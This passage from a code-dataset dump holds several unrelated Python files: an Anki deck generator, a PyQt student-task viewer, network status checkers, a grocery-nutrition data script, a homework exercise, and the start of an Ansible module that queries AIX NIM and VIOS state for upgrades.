If sync is false this has no effect.\",\n ),\n cloze: bool = typer.Option(\n False,\n \"--cloze\",\n help=\"Whether to support cloze syntax\",\n ),\n version: bool = typer.Option(\n False, \"--version\", callback=version_callback, help=\"Show version information\"\n ),\n):\n\n # iterate over the source directory\n for root, _, files in os.walk(input_dir):\n for file in files:\n if is_markdown_file(file):\n deck = parse_markdown(\n os.path.join(root, file), deck_title_prefix, cloze\n )\n package = genanki.Package(deck)\n # add all image files to the package\n package.media_files = image_files(input_dir)\n path_to_pkg_file = os.path.join(output_dir, f\"{Path(file).stem}.apkg\")\n package.write_to_file(path_to_pkg_file)\n print_success(f\"Created apkg for deck {deck.name}\")\n if sync:\n sync_deck(deck, Path(path_to_pkg_file), delete_cards)\n for model in deck.models.values():\n sync_model(model)\n\n\nANKI_CLOZE_REGEXP = re.compile(r\"{{c\\d+::[\\s\\S]+?}}\")\n\n\ndef has_clozes(text):\n \"\"\"Checks whether text actually has cloze deletions.\"\"\"\n return bool(ANKI_CLOZE_REGEXP.search(text))\n\n\n# check if a tag is a question\ndef is_question_tag(tag: Tag):\n return tag.name == \"h2\" or (isinstance(tag, Tag) and tag.has_attr(\"data-question\"))\n\n\ndef parse_markdown(\n file: str, deck_title_prefix: str, generate_cloze_model: bool\n) -> Deck:\n metadata, markdown_string = frontmatter.parse(read_file(file))\n html = markdown.markdown(\n markdown_string,\n extensions=[\"fenced_code\", \"sane_lists\", \"tables\", \"codehilite\", \"md_in_html\"],\n )\n\n soup = BeautifulSoup(html, \"html.parser\")\n\n # strip all comments from the html\n comments = soup.findAll(text=lambda text: isinstance(text, Comment))\n for comment in comments:\n comment.extract()\n\n # get the deck title\n deck_title = Path(file).stem\n h1 = soup.h1\n if h1 is not None and h1.text:\n deck_title = h1.text\n deck_title = deck_title_prefix + deck_title\n\n # model for an anki deck\n model = 
genanki.Model(\n model_id=integer_hash(f\"{deck_title} model\"),\n name=f\"{deck_title} model\",\n fields=[{\"name\": \"Question\"}, {\"name\": \"Answer\"}, {\"name\": \"Guid\"}],\n templates=[\n {\n \"name\": \"Card 1\",\n \"qfmt\": '
{{Question}}
',\n \"afmt\": '
{{Question}}

{{Answer}}
',\n },\n ],\n css=read_css(file, metadata),\n model_type=Model.FRONT_BACK,\n )\n\n # model for an anki deck\n cloze_model = genanki.Model(\n model_id=integer_hash(f\"{deck_title} cloze model\"),\n name=f\"{deck_title} cloze model\",\n fields=[{\"name\": \"Question\"}, {\"name\": \"Answer\"}, {\"name\": \"Guid\"}],\n templates=[\n {\n \"name\": \"Card 1\",\n \"qfmt\": '
{{cloze:Question}}
',\n \"afmt\": '
{{cloze:Question}}

{{Answer}}
',\n },\n ],\n css=read_css(file, metadata),\n model_type=Model.CLOZE,\n )\n\n # create the deck\n deck_id = integer_hash(deck_title)\n deck = genanki.Deck(deck_id=deck_id, name=deck_title)\n\n # add model to deeck\n deck.add_model(model)\n if generate_cloze_model:\n deck.add_model(cloze_model)\n\n # get the notes\n note_headers = soup.find_all(is_question_tag, recursive=False)\n for header in note_headers:\n # the question is the header\n question = header\n\n # the contents are everything until the next header\n contents = list(\n itertools.takewhile(\n lambda el: not is_question_tag(el), header.next_siblings\n )\n )\n\n # wrap the contents in a section tag. the section is the answer.\n answer = soup.new_tag(\"section\")\n if len(contents) > 0:\n contents[0].wrap(answer)\n for content in contents[1:]:\n answer.append(content)\n\n # create the note using the simple model\n note = FrontIdentifierNote(\n deck_id,\n model=(\n cloze_model\n if generate_cloze_model\n and has_clozes(soup_to_plaintext_string(question))\n else model\n ),\n fields=[soup_to_html_string(question), soup_to_html_string(answer)],\n )\n deck.add_note(note)\n\n return deck\n\n\n# genanki Note which has a unique id based on the deck and the question\n# also has a field for the guid so the guid can be accessed in queries\nclass FrontIdentifierNote(genanki.Note):\n def __init__(self, deck_id, model=None, fields=None, sort_field=None, tags=None):\n guid = genanki.guid_for(fields[0], deck_id)\n if fields is not None:\n fields.append(guid)\n super().__init__(\n model=model, fields=fields, sort_field=sort_field, tags=tags, guid=guid\n )\n\n\n# convert beautiful soup object to a string\ndef soup_to_html_string(soup):\n return soup.prettify(formatter=\"html5\")\n\n\ndef soup_to_plaintext_string(soup):\n return soup.get_text()\n\n\n# convert a file to a string\ndef read_file(file):\n with open(file, \"r\", encoding=\"utf-8\") as f:\n markdown_string = f.read()\n return markdown_string\n\n\n# check if a 
file is a markdown file\ndef is_markdown_file(file):\n # TODO(lukemurray): parameterize markdown extensions?\n return file.endswith(\".md\")\n\n\n# convert a string into a random integer from 0 to 1<<31 exclusive\n# used to create model and deck ids\n# from https://stackoverflow.com/a/42089311/11499360\ndef integer_hash(s: str):\n return int(hashlib.sha256(s.encode(\"utf-8\")).hexdigest(), 16) % (1 << 31)\n\n\n# get all the image files in a directory\ndef image_files(source: Path):\n return list(\n str(p)\n for p in itertools.chain(\n source.rglob(\"*.jpg\"),\n source.rglob(\"*.jpeg\"),\n source.rglob(\"*.png\"),\n source.rglob(\"*.gif\"),\n )\n )\n\n\ndef read_css(file: str, metadata: dict) -> str:\n # merge the css files\n markdown_css = Path(__file__).parent / \"./styles/markdown.css\"\n pygments_css = Path(__file__).parent / \"./styles/pygments.css\"\n pygments_dark_css = Path(__file__).parent / \"./styles/pygments-dark.css\"\n custom_css_contents = []\n if \"css\" in metadata:\n custom_css_paths = metadata[\"css\"]\n if not isinstance(custom_css_paths, list):\n custom_css_paths = [custom_css_paths]\n for custom_css_path in custom_css_paths:\n custom_css_contents.append(\n (Path(file).parent / custom_css_path).read_text(\"utf-8\")\n )\n\n custom_css = \"\\n\".join(custom_css_contents)\n\n return f'{markdown_css.read_text(\"utf-8\")}\\n{pygments_css.read_text(\"utf-8\")}\\n{pygments_dark_css.read_text(\"utf-8\")}\\n{custom_css}'\n\n\ndef main():\n app()\n","sub_path":"markdown_anki_decks/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":8762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"563817072","text":"import fnmatch\nimport os\n\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.QtWidgets import QMainWindow, QAction, QFileDialog\nfrom PyQt5.QtCore import pyqtSlot\n\nfrom models.tasksModel import TasksModel\nfrom models.studentsModel import StudentsModel\n\nfrom views.mainWindow_ui import 
Ui_MainWindow\n\nclass MainView(QMainWindow):\n def __init__(self, model, main_controller):\n super().__init__()\n\n self._model = model\n self._main_controller = main_controller\n self._ui = Ui_MainWindow()\n self._ui.setupUi(self)\n self.initUI()\n self.con()\n\n\n def initUI(self):\n self.statusBar().showMessage('Ready')\n\n openFile = QAction(QIcon('open.png'), 'Открыть', self)\n openFile.setShortcut('Ctrl+O')\n openFile.setStatusTip('Открыть директорию')\n openFile.triggered.connect(self.showDialog)\n\n menubar = self.menuBar()\n fileMenu = menubar.addMenu('Файл')\n fileMenu.addAction(openFile)\n\n def con(self):\n self._ui.themeComboBox.currentIndexChanged.connect(self.fun)\n\n def showDialog(self):\n dir = str(QFileDialog.getExistingDirectory(self, 'Выберите папкy', '/home/valerie/University/Diploma/Math-packages-course-automatization/mp2017-collect'))\n if dir:\n self._model.setDirectory(dir)\n self.statusBar().showMessage(dir)\n listOfTasks = sorted(getListOfFiles(dir, \"*.m\"))\n i = 0\n while(i < len(listOfTasks)):\n self._ui.themeComboBox.addItem(listOfTasks[i].split(dir)[1].split('/')[1])\n i = i + 1\n\n self.tasksModel = TasksModel(listOfTasks, dir)\n self._ui.tasksTableView.setModel(self.tasksModel)\n self._ui.tasksTableView.horizontalHeader().hide()\n self._ui.tasksTableView.horizontalHeader().setStretchLastSection(True)\n\n problem = '/octave-1/'\n self.showStudents(dir, problem)\n\n def showStudents(self, dir, problem):\n dirName = dir + problem\n listOfStudentsDir = getListOfFiles(dirName, \"*.m\")\n\n studentsList = list()\n for i in range(len(listOfStudentsDir)):\n files = os.listdir(listOfStudentsDir[i])\n for entry in files:\n if fnmatch.fnmatch(entry, '*.txt'):\n studentsList.insert(i, entry.split(\"STUDENT - \")[1].split(\".txt\")[0])\n print(studentsList)\n\n self.studentsModel = StudentsModel(studentsList)\n self._ui.studentsTableView.setModel(self.studentsModel)\n self._ui.studentsTableView.horizontalHeader().hide()\n 
self._ui.studentsTableView.horizontalHeader().setStretchLastSection(True)\n\n def fun(self, i):\n print(i)\n\n #@pyqtSlot(str)\n #def on_directory_changed(self, value):\n # print(\"smth\")\n # self._ui.programPlainTextEdit.setPlainText(value)\n\n'''\n # connect widgets to controller\n self._ui.spinBox_amount.valueChanged.connect(self._main_controller.change_amount)\n self._ui.pushButton_reset.clicked.connect(lambda: self._main_controller.change_amount(0))\n\n # listen for model event signals\n self._model.amount_changed.connect(self.on_amount_changed)\n self._model.even_odd_changed.connect(self.on_even_odd_changed)\n self._model.enable_reset_changed.connect(self.on_enable_reset_changed)\n\n # set a default value\n self._main_controller.change_amount(42)\n\n @pyqtSlot(int)\n def on_amount_changed(self, value):\n self._ui.spinBox_amount.setValue(value)\n\n @pyqtSlot(str)\n def on_even_odd_changed(self, value):\n self._ui.label_even_odd.setText(value)\n\n @pyqtSlot(bool)\n def on_enable_reset_changed(self, value):\n self._ui.pushButton_reset.setEnabled(value)\n'''\n\ndef getListOfFiles(dirName, pattern):\n # create a list of file and sub directories\n # names in the given directory\n listOfFile = os.listdir(dirName)\n allFiles = list()\n\n # Iterate over all the entries\n for entry in listOfFile:\n # Create full path\n fullPath = os.path.join(dirName, entry)\n # If entry is a directory then get the list of files in this directory\n if os.path.isdir(fullPath) & fnmatch.fnmatch(entry, pattern):\n allFiles = allFiles + getListOfFiles(fullPath)\n else:\n allFiles.append(fullPath)\n return allFiles\n","sub_path":"views/main_view.py","file_name":"main_view.py","file_ext":"py","file_size_in_byte":4407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"485950884","text":"import subprocess\nimport re\n\nfrom goopy_sched import GoopyTask\n\n\nclass WlStat(GoopyTask):\n\n def __init__(self, model, ifname, interval=5, 
delay=0):\n self._ifname = ifname\n self._model = model\n self._sp = re.compile('Signal level=([0-9]+)/100')\n\n self._update_model(False, 0)\n\n super().__init__(interval=interval, delay=delay)\n\n def fire(self):\n\n up = False\n signal = 0\n\n try:\n out = subprocess.check_output(['/sbin/iwconfig', self._ifname],\n universal_newlines=True,\n stderr=subprocess.DEVNULL)\n\n up = True\n for line in out.splitlines():\n if line.find('unassociated') > -1:\n up = False\n break\n else:\n match = self._sp.search(line)\n if match:\n signal = match.group(1)\n\n except subprocess.CalledProcessError:\n pass\n\n self._update_model(up, signal)\n\n def _update_model(self, up, signal):\n\n self._model.wl_up = up\n self._model.wl_signal = signal\n\n\nclass ConnStat(GoopyTask):\n\n def __init__(self, model, hostname, interval=30, delay=0):\n self._model = model\n self._hostname = hostname\n self._update_model(False)\n\n super().__init__(interval=interval, delay=delay)\n\n def fire(self):\n\n ok = False\n code = subprocess.call(['/bin/ping', '-q', '-c1', self._hostname],\n stderr=subprocess.DEVNULL,\n stdout=subprocess.DEVNULL)\n if code == 0:\n ok = True\n\n self._update_model(ok)\n\n def _get_interval(self):\n return super()._get_interval() if self._model.conn_ok else 5\n\n def _update_model(self, ok):\n\n self._model.conn_ok = ok\n","sub_path":"goopy_net.py","file_name":"goopy_net.py","file_ext":"py","file_size_in_byte":1912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"515614461","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# ### Remarks / TODO:\n# -there are a few food items in MISC. 
TRANS\n# - add the nutrients present under different names and ids, such as: carbohydrates or carbohydrates by difference\n\nimport re\nimport os\nimport nltk\nimport time\nimport pickle\nimport sys\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nsys.path.insert(1, './utilities/')\nfrom health_functions import *\n\n# # Import Data\ndef import_data(path1, path2):\n dfList = {}\n for r, d, f in os.walk(path1):\n for file in f:\n if '.csv' in file:\n print(file)\n dfList[file] = pd.read_csv(os.path.join(r, file))\n\n products_df = dfList['product.csv']\n transaction_data_df = dfList['transaction_data.csv']\n\n dfList = {}\n for r, d, f in os.walk(path2):\n for file in f:\n if '.csv' in file:\n # print(file)\n dfList[file] = pd.read_csv(os.path.join(r, file))\n\n # link the nutrient id with its name\n nutrient_df = dfList['nutrient.csv']\n # contains the food articles name and their id test commit\n food_df = dfList['food.csv']\n # contains the nutrients for each food article\n food_nutrients_df = dfList['food_nutrient.csv']\n # linke the food articles ids to their category\n food_category_df = dfList['food_category.csv']\n return products_df,transaction_data_df, nutrient_df, food_df, food_nutrients_df, food_category_df\n\n# ### Most sold items\ndef compute_most_sold_items(products_df,transaction_data_df,selected_categories):\n #select all the items sold at least 1000 times\n sales_qte_df = transaction_data_df[['PRODUCT_ID','QUANTITY']] .groupby(['PRODUCT_ID']).sum().sort_values(by=['QUANTITY'],ascending=False)\n sales_qte_df = sales_qte_df[sales_qte_df['QUANTITY'] > 1000]\n sales_qte_df.head(5)\n\n #select only the categories which are food related and sort them\n products_sales_df = products_df.loc[(products_df['DEPARTMENT'].isin(selected_categories))].join(sales_qte_df, on='PRODUCT_ID', how='inner')\n products_sales_df.sort_values(by='QUANTITY',ascending=False,inplace=True)\n\n #we put all the description in a ingredients column\n 
products_sales_df['ingredients'] = products_sales_df.COMMODITY_DESC + \" \" + products_sales_df.SUB_COMMODITY_DESC\n products_sales_df.drop([\"DEPARTMENT\",\"BRAND\",\"COMMODITY_DESC\",\"SUB_COMMODITY_DESC\"],axis = 1, inplace = True)\n products_sales_df.ingredients = products_sales_df.ingredients.apply(parse_words)\n\n return products_sales_df\n\ndef clean_dfs(food_nutrients_df,nutrient_df,food_category_df,food_df,list_relevant_nutrients):\n #drop unnecessary columns and rename to be more understandable\n food_nutrients_df.drop([\"data_points\",\"min\",\"max\",\"median\",\"footnote\",\"min_year_acquired\",\"derivation_id\"],axis=1,inplace=True)\n nutrient_df.drop([\"nutrient_nbr\",\"rank\"],axis=1,inplace=True)\n food_category_df.drop([\"code\"],axis=1,inplace=True)\n food_df.drop([\"publication_date\"],axis=1,inplace=True)\n\n food_category_df.rename(columns={'id':'food_category_id','description':'category'},inplace= True)\n #filter out only the necessary food nutrients\n nutrient_df = nutrient_df[nutrient_df.name.isin(list_relevant_nutrients)]\n\n #simplyfy and normalize the nutrient names\n simplified_names = nutrient_df.name.apply(trim_nutrient_name)\n nutrient_df.loc[:,\"name\"] = simplified_names\n # add the names of the nutrients contained in the food\n\n return food_nutrients_df, nutrient_df, food_category_df, food_df\n\n\ndef complete_food_dfs(food_nutrients_df, food_df):\n food_nutrients_df = food_nutrients_df.join(nutrient_df.set_index('id'), on='nutrient_id', how='inner')\n\n #takes a long time to run\n #food_nutrients_df.amount = food_nutrients_df[[\"amount\",\"unit_name\"]].apply(get_amount, axis=1)\n #food_nutrients_df.drop(\"unit_name\",axis=1,inplace=True))\n\n #energy is duplicated because we have both kcal and kj, we take only kcal\n food_nutrients_df = food_nutrients_df.pivot_table(index='fdc_id', columns='name', values='amount',aggfunc='first')\n food_nutrients_df.fillna(value=0, inplace=True)\n\n #add categories to the food df\n food_df = 
food_df.join(food_category_df.set_index(\"food_category_id\"),on=\"food_category_id\",how=\"left\")\n food_df.drop([\"food_category_id\"],axis=1,inplace=True)\n food_df.description = food_df.description.apply(parse_words)\n\n return food_nutrients_df, food_df\n\nif __name__ == \"__main__\":\n DUNNHUMBY_PATH = '../data/dunnhumby - The Complete Journey CSV/'\n HEALTH_PATH = '../data/health'\n products_df, transaction_data_df, nutrient_df, food_df, food_nutrients_df, food_category_df = import_data(DUNNHUMBY_PATH,HEALTH_PATH)\n\n food_related_categories = np.array(\n ['NUTRITION', 'GROCERY', 'PASTRY', 'MEAT-PCKGD', 'SEAFOOD-PCKGD', 'PRODUCE', 'DELI', 'MEAT', 'SALAD BAR',\n 'GRO BAKERY', 'FROZEN GROCERY', 'SPIRITS', 'RESTAURANT'])\n list_relevant_nutrients = [\"Protein\", \"Total Carbohydrate\", \"Total lipid (fat)\", \"Sucrose\", \"Glucose (dextrose)\",\n \"Sugars, total including NLEA\", \"Fatty acids, total monounsaturated\",\n \"Fatty acids, total polyunsaturated\", \"Fatty acids, total trans\",\n \"Fatty acids, total saturated\", \"Cholesterol\", \"Vitamin E, added\",\n \"Vitamin K (phylloquinone)\", \"Vitamin B-12\", \"Vitamin B-6\", \"Vitamin D\",\n \"Vitamin A, RAE\", \"Sodium, Na\", \"Total fat (NLEA)\", \"Fiber, total dietary\", \"Energy\",\n \"Carbohydrate, by summation\", \"Fructose\"]\n\n products_sales_df = compute_most_sold_items(products_df, transaction_data_df, food_related_categories)\n food_nutrients_df, nutrient_df, food_category_df, food_df = clean_dfs(food_nutrients_df, nutrient_df, food_category_df, food_df, list_relevant_nutrients)\n food_nutrients_df, food_df = complete_food_dfs(food_nutrients_df, food_df)\n\n all_information_df = food_df.join(food_nutrients_df, on='fdc_id', how='inner')\n all_information_df.drop([\"data_type\", \"description\", \"category\"], axis=1, inplace=True)\n\n #Compute word importance for algo\n # all words present in the nutrition dataset\n all_words_nutrition = get_allwords(food_df.description)\n # all words present 
in the product dataset\n all_words_supermarket = get_allwords(products_sales_df.ingredients)\n\n # #### Inner merge between the 2 sets of words:\n common_words = pd.merge(all_words_supermarket, all_words_nutrition, left_on='name', right_on='name',\n suffixes=('_supermarket', '_nutrition'))\n DIC_SCORE = construct_dic_score(common_words)\n\n #matching the two datasets\n #there is an error in the code, so for now we only using the top 10 items\n temp_df = products_sales_df.head(10).copy()\n find_food1 = lambda list_words: find_food(list_words, food_df, DIC_SCORE)\n temp_df[\"ref_fdc_id\"] = temp_df.ingredients.apply(find_food1).fdc_id\n\n #create our final df with the nutrient information of the supermarket items\n all_df = temp_df.merge(all_information_df, how=\"left\", left_on=\"ref_fdc_id\", right_on=\"fdc_id\")\n all_df.drop([\"MANUFACTURER\", \"ref_fdc_id\", \"fdc_id\"], axis=1, inplace=True)\n all_df.set_index(\"PRODUCT_ID\", inplace=True)\n\n # saves results of this lengthy computation\n all_df.to_pickle(\"../data/results/products_with_link_to_nutrients_df.pickle\")\n\n print(\"done\")\n","sub_path":"src/Health/.ipynb_checkpoints/Health2-checkpoint.py","file_name":"Health2-checkpoint.py","file_ext":"py","file_size_in_byte":7501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"615188238","text":"# Реализовать функцию my_func(), которая принимает три позиционных аргумента,\n# и возвращает сумму наибольших двух аргументов.\n\n\ndef my_func(first_number, second_number, third_number):\n \"\"\"\n функция считает сумму наибольших аргументов\n :param first_number: первое число\n :param second_number: второе число\n :param third_number: третье число\n :return: ничего не возвращает и сразу выводит на экран\n # переводим в список чтобы воспользоваться функцией max\n # списох чтобы сохранить наибольшие числа, чтобы потом использовать функцию sum\n # ищем 1ое максимальное число\n # записываем в список для подсчета 
суммы\n # удаляем из списка аргументов 1е максимально число чтобы найти 2е максимальное\n # добавляем в список для подсчета суммы и потом выводим сумму чисел\n # находим второе максимальное число\n \"\"\"\n my_list = [first_number, second_number, third_number]\n my_sum = []\n max_number = max(my_list)\n my_sum.append(max_number)\n my_list.remove(max_number)\n max_number = max(my_list)\n my_sum.append(max_number)\n print(sum(my_sum))\n\n\nmy_func(-1, -2, 4)\n","sub_path":"HW_3/HW_3.3.py","file_name":"HW_3.3.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"48101626","text":"#!/usr/bin/python\n#\n# Copyright 2018, International Business Machines Corporation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n############################################################################\n\"\"\"AIX NIM viosupgrade: tool to upgrade VIOSes in NIM environment\"\"\"\n\nimport os\nimport re\nimport subprocess\nimport threading\nimport logging\nimport time\nimport distutils.util\n\n# Ansible module 'boilerplate'\nfrom ansible.module_utils.basic import AnsibleModule\n\n\nDOCUMENTATION = \"\"\"\n---\nmodule: nim_upgradeios\nauthors: Vianney Robin, Alain Poncet, Pascal Oliva\nshort_description: Perform upgrade operation on a list of targets\nusing viosupgrade (perl) tool\n\"\"\"\n\n\n# -----------------------------------------------------------------------------\ndef exec_cmd(cmd, 
module, exit_on_error=False, debug_data=True, shell=False):\n\n \"\"\"\n Execute the given command\n\n Note: If executed in thread, fail_json does not exit the parent\n\n args:\n - cmd array of the command parameters\n - module the module variable\n - exit_on_error use fail_json if true and cmd return !0\n - debug_data prints some trace in DEBUG_DATA if set\n - shell execute cmd through the shell if set (vulnerable to shell\n injection when cmd is from user inputs). If cmd is a string\n string, the string specifies the command to execute through\n the shell. If cmd is a list, the first item specifies the\n command, and other items are arguments to the shell itself.\n return\n - ret return code of the command\n - output output and stderr of the command\n - errout command stderr\n \"\"\"\n\n global DEBUG_DATA\n global CHANGED\n global OUTPUT\n\n ret = 0\n output = ''\n errout = ''\n\n th_id = threading.current_thread().ident\n stderr_file = '/tmp/ansible_upgradeios_cmd_stderr_{}'.format(th_id)\n\n logging.debug('command:{}'.format(cmd))\n if debug_data is True:\n DEBUG_DATA.append('exec_cmd:{}'.format(cmd))\n try:\n myfile = open(stderr_file, 'w')\n output = subprocess.check_output(cmd, stderr=myfile, shell=shell)\n myfile.close()\n s = re.search(r'rc=([-\\d]+)$', output)\n if s:\n ret = int(s.group(1))\n output = re.sub(r'rc=[-\\d]+\\n$', '', output) # remove the rc of c_rsh with echo $?\n\n except subprocess.CalledProcessError as exc:\n myfile.close()\n errout = re.sub(r'rc=[-\\d]+\\n$', '', exc.output) # remove the rc of c_rsh with echo $?\n ret = exc.returncode\n\n except OSError as exc:\n myfile.close()\n errout = re.sub(r'rc=[-\\d]+\\n$', '', exc.args[1]) # remove the rc of c_rsh with echo $?\n ret = exc.args[0]\n\n except IOError as exc:\n # generic exception\n myfile.close()\n msg = 'Command: {} Exception: {}'.format(cmd, exc)\n ret = 1\n module.fail_json(changed=CHANGED, msg=msg, output=OUTPUT)\n\n # check for error message\n if os.path.getsize(stderr_file) 
> 0:\n myfile = open(stderr_file, 'r')\n errout += ''.join(myfile)\n myfile.close()\n os.remove(stderr_file)\n\n if debug_data is True:\n DEBUG_DATA.append('exec_cmd rc:{}, output:{} errout:{}'\n .format(ret, output, errout))\n logging.debug('retrun rc:{}, output:{} errout:{}'\n .format(ret, output, errout))\n\n if ret != 0 and exit_on_error is True:\n msg = 'Command: {} RetCode:{} ... stdout:{} stderr:{}'\\\n .format(cmd, ret, output, errout)\n module.fail_json(changed=CHANGED, msg=msg, output=OUTPUT)\n\n return (ret, output, errout)\n\n\n# ----------------------------------------------------------------\ndef get_ios_mksysb(module):\n\n \"\"\"\n Get all resources of type ios_mksysb and the associated\n spot resources and ioslevel\n defined on the nim master.\n Arguments:\n module: {}\n Return: info_hash = {}\n info_hash[ios_mksysb_name]['spot'] = (String)spot_name\n info_hash[ios_mksysb_name]['ioslevel'] = (String)ioslevel\n \"\"\"\n global CHANGED\n global OUTPUT\n info_hash = {}\n cmd = 'LC_ALL=C lsnim -t ios_mksysb -l'\n (ret, std_out, std_err) = exec_cmd(cmd, module, shell=True)\n if ret != 0:\n msg = 'Cannot list NIM ios_mksysb objects: {}'.format(std_err)\n logging.error(msg)\n module.fail_json(changed=CHANGED, msg=msg, meta=OUTPUT)\n # mksysb_name name and associated spot\n ios_mksysb_name = \"\"\n for line in std_out.split('\\n'):\n line = line.strip()\n match_key = re.match(r\"^(\\S+):\", line)\n if match_key:\n ios_mksysb_name = match_key.group(1)\n info_hash[ios_mksysb_name] = {}\n continue\n\n match_key = re.match(r\"^ioslevel\\s+=\\s+(.*)$\", line)\n if match_key:\n ioslevel = match_key.group(1)\n info_hash[ios_mksysb_name]['ioslevel'] = ioslevel\n continue\n match_key = re.match(r\"^extracted_spot\\s+=\\s+(.*)$\", line)\n if match_key:\n spot = match_key.group(1)\n info_hash[ios_mksysb_name]['spot'] = spot\n continue\n\n logging.debug('ios_mksysb={}'.format(info_hash))\n return info_hash\n\n\n# 
----------------------------------------------------------------\ndef get_nim_user_res(module):\n\n \"\"\"\n Get the list of resources of type resolv_conf, script,\n fb_script, file_res, image_data, and log\n defined on the nim master.\n Arguments:\n module: {}\n\n Return: Dictionary of reources key=name valu=type\n type=resolv_conf|script|fb_script|file_res|image_data|and log\n \"\"\"\n global CHANGED\n global OUTPUT\n std_out = ''\n nim_user_res = {}\n\n cmd = 'LC_ALL=C lsnim -t resolv_conf; lsnim -t script; lsnim -t fb_script; '\\\n 'lsnim -t file_res; lsnim -t image_data; lsnim -t log'\n (ret, std_out, std_err) = exec_cmd(cmd, module, shell=True)\n if ret != 0:\n msg = 'Cannot list NIM resource: {}'.format(std_err)\n logging.error(msg)\n module.fail_json(changed=CHANGED, msg=msg, meta=OUTPUT)\n\n for line in std_out.split('\\n'):\n line = line.strip()\n match_key = re.match(r\"^(\\S+)\\s+\\S+\\s+(\\S+)$\", line)\n if match_key:\n nim_user_res[match_key.group(1)] = match_key.group(2)\n continue\n\n return nim_user_res\n\n\n# ----------------------------------------------------------------\ndef get_nim_clients_info(module):\n \"\"\"\n Get the list of vios defined on the nim master, and get their\n associated cstate and hostname.\n Arguments:\n module: {}\n Return: info_hash = {}\n info_hash[vios_name]['cstate'] = (String) vios cstate\n info_hash[vios_name]['host_name'] = (String) hostname to access vios\n \"\"\"\n global CHANGED\n global OUTPUT\n std_out = ''\n info_hash = {}\n\n cmd = 'LC_ALL=C lsnim -t vios -l'\n (ret, std_out, std_err) = exec_cmd(cmd, module, shell=True)\n if ret != 0:\n msg = 'Cannot list NIM vios objects: {}'.format(std_err)\n logging.error(msg)\n module.fail_json(changed=CHANGED, msg=msg, meta=OUTPUT)\n\n vios_name = \"\"\n for line in std_out.split('\\n'):\n line = line.strip()\n match_key = re.match(r\"^(\\S+):\", line)\n if match_key:\n vios_name = match_key.group(1)\n info_hash[vios_name] = {}\n continue\n\n match_cstate = 
re.match(r\"^Cstate\\s+=\\s+(.*)$\", line)\n if match_cstate:\n cstate = match_cstate.group(1)\n info_hash[vios_name]['cstate'] = cstate\n continue\n\n # Get VIOS interface info in case we need c_rsh\n match_if = re.match(r\"^if1\\s+=\\s+\\S+\\s+(\\S+)\\s+.*$\", line)\n if match_if:\n info_hash[vios_name]['vios_ip'] = match_if.group(1)\n continue\n\n return info_hash\n\n\n# ----------------------------------------------------------------\ndef get_cluster_status(module, vios):\n\n \"\"\"\n get the status of the vios node in the cluster of vios\n Arguments:\n module: {}\n vios: {}\n Return: integer 0 or 1\n \"\"\"\n\n rc = 1\n if not vios[\"cluster_id\"]:\n return 0\n # get cluster status\n cmd = ['/usr/lpp/bos.sysmgt/nim/methods/c_rsh', vios[\"host_name\"],\n 'LC_ALL=C /usr/ios/cli/ioscli cluster -status -fmt :']\n # 'LC_ALL=C /usr/ios/cli/ioscli cluster -status -field '\\\n # 'node_name node_state pool_state node_upgrade_status -verbose\"']\n (ret, std_out, std_err) = exec_cmd(cmd, module)\n # parse std_out\n for line in std_out.split('\\n'):\n line = line.strip()\n match_key = re.match(r\"^(\\S+):(\\S+):(\\S+):(\\S+):(\\d+):(\\S+):(.*)\", line)\n if match_key:\n if match_key.group(6) == \"DOWN\" or match_key.group(7) == \"DOWN\":\n return 1\n else:\n rc = 0\n return rc\n\n\n# ----------------------------------------------------------------\ndef get_viosupgrade_status(module, vios):\n\n \"\"\"\n Run lsnim command to get the vios status during upgrade process\n set vios[\"status\"] = DONE | RUNNING | ERROR\n Arguments:\n module: {}\n vios: {}\n Return: String status = SUCCESS-UPGRADE | RUNNING | FAILURE-UPGRADE\n \"\"\"\n global ERROR\n global RUNNING\n global DONE\n status = RUNNING\n std_out = \"\"\n cmd = 'LC_ALL=C /usr/sbin/lsnim -l {}'.format(vios[\"name\"])\n (ret, std_out, std_err) = exec_cmd(cmd, module, shell=True)\n if ret != 0:\n msg = 'Viosupgrade error on vios: {} :{}'\\\n .format(vios[\"name\"], std_err)\n logging.error(msg)\n status = ERROR\n 
vios[\"status\"] = ERROR\n else:\n # parse std_out\n # wait for strings:\n # Cstate = ready for a NIM operation\n # Mstate = currently running\n # Cstate_result = success\n # info = m..e..s..s..a..g..e..\n # err_info = m..e..s..s..a..g..e..\n Mstate = \"\"\n Cstate = \"\"\n Cstate_result = \"\"\n info = \"\"\n for line in std_out.split('\\n'):\n line = line.strip()\n match_key = re.match(r\"^(\\S+)\\s+=\\s+(.*)\", line)\n if match_key:\n if match_key.group(1) == \"Mstate\":\n Mstate = match_key.group(2)\n\n if match_key.group(1) == \"Cstate\":\n Cstate = match_key.group(2)\n\n if match_key.group(1) == \"Cstate_result\":\n Cstate_result = match_key.group(2)\n\n if match_key.group(1) == \"info\":\n info = match_key.group(2)\n continue\n if match_key.group(1) == \"err_info\":\n status = ERROR\n vios[\"status\"] = ERROR\n messages = std_out.split(\"\\n\", 1)\n OUTPUT.append(\"NIM error info {})\".format(messages[0]))\n for line in messages[1].split(\"\\n\"):\n OUTPUT.append(line)\n return status\n\n if not info and Cstate == \"ready for a NIM operation\"\\\n and (Cstate_result == \"success\" or Cstate_result == \"reset\")\\\n and (Mstate == \"currently running\" or Mstate == \"ready for use\"):\n status = DONE\n else:\n status = RUNNING\n vios[\"status\"] = status\n return status\n\n\n# 